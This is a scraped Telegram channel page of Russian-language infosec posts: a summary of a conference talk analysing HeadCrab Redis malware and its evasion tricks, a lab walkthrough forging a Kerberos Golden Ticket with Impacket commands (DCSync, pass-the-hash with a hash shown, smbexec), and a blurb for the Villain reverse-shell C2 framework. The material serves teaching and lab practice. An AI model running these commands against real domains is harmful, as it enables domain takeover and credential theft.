uz
Feedback
Fsecurity | HH

Fsecurity | HH

Kanalga Telegram’da o‘tish

Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb

Ko'proq ko'rsatish
2 009
Obunachilar
Ma'lumot yo'q24 soatlar
-27 kunlar
-1230 kunlar
Postlar arxiv
Как вам ролик ?🤔
Anonymous voting

sticker.webp0.20 KB

Новый ролик уже на канале 🥳👇🏻 https://youtu.be/wlYFkBT6Ca8?si=9l76aEeVTnSN0CAn Приятного просмотра 👾

Хочу также посоветовать: 1 - Проверить себя на утечки! 💧 2 - Наш discord сервер! Где можно пообщаться 👾 3 - Мой Github 🦑 Наш второй канал [Ximera-Chan]

sticker.webp0.34 KB

Ждите завтра ролик 👾

Repost from PurpleBear
REDIScovering HeadCrab - A Technical Analysis of a Novel Malware and the Mind Behind It Так звучит название отличного доклада про анализ малвари HeadCrab от Aqua Security на BlackHat EU 2023. Содержание представляет собой детальное исследование HeadCrab, который использовался для атак на сервера Redis c целью майнинга криптовалюты. 🔴 Initial Assess В качестве вектора для получения первоначального доступа злоумышленники использовали технику SLAVEOF/REPLICAOF из доклада крутого ресерчера Павла Топоркова aka Paul Axe на ZeroNights 2018❤️ Редис имеет функциональность, которая заключается в создании копии данных на другом сервере, с помощью redis-cli replicaof <master_host> <master_port>. Так злодей, который получил доступ к серверу без protected mode, с помощью подбора слабых учетных данных, имеет возможность подключить его как slave (стало не политкорректно с версии Redis 5.0) т.е replica к своему мастер-серверу и получить таким образом возможность RCE 🔴 Exploitation Далее на атакуемый сервер устанавливается Redis модуль - Loader.so в версии HeadCrab2.0, который загружает основную малварь HeadCrab.so в memfd (Memory File Descriptor) т.е в RAM, не оставляю следов на диске 🔴 C2/Defense Evasion Загруженный основной модуль перезаписывает дефолтные команды Redis overwrite_command ("replicaof", qword_245788, 0LL, 0LL, invalid_command_err_3) чтобы затруднить идентификацию и избавиться от конкурентов 🔴 Post Exploitation Далее устанавливается XMRig для майнинга криптовалюты Monero 🔴 Persistence/Defense Evasion ☑️ Создаются переменные окружения для перетирания shell history - HISTFILE=/dev/null ☑️ Удаление логов, при этом интересно, что логи не просто сносятся, а изменяется размер файлов - truncate ("/var/log/redis/redis.log", 0LL) ☑️ Сокрытие конфигов в атрибутах, вместо создания файлов на диске - return setxattr(path, "trusted.cfg", v5, 0x18uLL, 0) ☑️ Исполнение Lua скриптов в памяти ☑️ Использование ld.so как LOTL лоадер ☑️ Использование Files Timestomping, для затруднения расследования инцидента ☑️ Использование inotify для затруднения расследования инцидента (inotify для "proc/%d/stat", например для top просто отключает майнер, а "dev/pts/%s" для pty сессий ssh) 🔴 Credential Access/Defense Evasion Далее таким же образом загружается малварь ice9j для сбора кредов во время аутентификации для SSHd, FTPd, Maild и SQLd (предположительно в разработке) с использованием различных техник от ptrace до манипуляций с /proc/$pid/mem Использование anti-debugging техник и fanotify для затруднения расследования инцидента Интересный факт, что исследователи общались с автором малвари, который(ая) представился ice9 по электронной почте, который охотно взаимодействовал и даже поблагодарил ресерчеров за проявленный интерес "Thanks, you are the first one who wrote to this email"🤪 PS: Желаю всем удачного окончания недели и отличных выходных!

Repost from Purple Chronicles
photo content
+1

Repost from Purple Chronicles
🎫Немного о Golden Ticket🎫 Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket👩‍💻:
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser
Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)
О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили! Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos🖼️ Для тех, кто не в теме: Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью. Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен. Естественно, если обновление установлено. В этом и кроется суть ошибки, которую мы могли наблюдать выше. Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим! Для начала обновите Impacket!
apt install python3-impacket
После обновления выпустить золотой билет можно следующей командой:
python3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser
При этом обратная совместимость со старым PAC так же останется:
python3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username
Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:
# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4

# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt

# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute

# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova

# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts

# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass
Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи amaslova!

Советую почитать 👾 🔗Ссылка: https://habr.com/ru/companies/jetinfosystems/articles/805297/

🎃 Villain - это фреймворк C2, который может обрабатывать несколько TCP-сокетов и обратных оболочек на основе HoaxShell, расш
🎃 Villain - это фреймворк C2, который может обрабатывать несколько TCP-сокетов и обратных оболочек на основе HoaxShell, расширять их функциональность с помощью дополнительных функций и делиться ими между подключенными серверами. 🔎 Основные функции фреймворка включают в себя: ⏺Генерация полезной нагрузки Динамически задействованная подсказка псевдооболочки ⏺Загрузка файлов (через http), ⏺Автозапрос http и скрипты exec для сеансов ⏺Командный чат ⏺Защитник сеанса ↘️ Github #tool // nsis